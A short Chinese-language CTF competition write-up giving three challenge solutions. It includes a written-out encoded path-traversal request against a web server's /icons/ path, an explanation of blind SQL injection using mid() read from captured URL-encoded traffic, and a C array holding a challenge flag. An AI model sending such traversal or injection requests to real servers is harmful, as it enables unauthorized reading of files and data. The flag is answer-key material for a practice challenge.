电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup
一、 战队信息战队名称:20221214
战队排名:1
二、 解题过程
ctf1
用Winhex打开,末了有一串编码字符,拿去一把梭即可。
https://img2024.cnblogs.com/blog/2978268/202404/2978268-20240401131329824-806677506.png
ctf2
目录穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag
https://img2024.cnblogs.com/blog/2978268/202404/2978268-20240401131412192-1023400520.png
ctf3
仔细观察可以看到url编码后的SQL注入语句,mid用于截取字符串,当出现welcome admin!阐明该字符正确,将正确的字符逐个写入到C脚本变量中,输出得到flag。
char a[] = {102,108,97,103,123,99,49,52,50,54,53,97,53,51,98,101,99,49,56,52,56,98,102,97,99,50,100,102,100,97,51,101,54,54,55,98,99,125}; cout
页:
[1]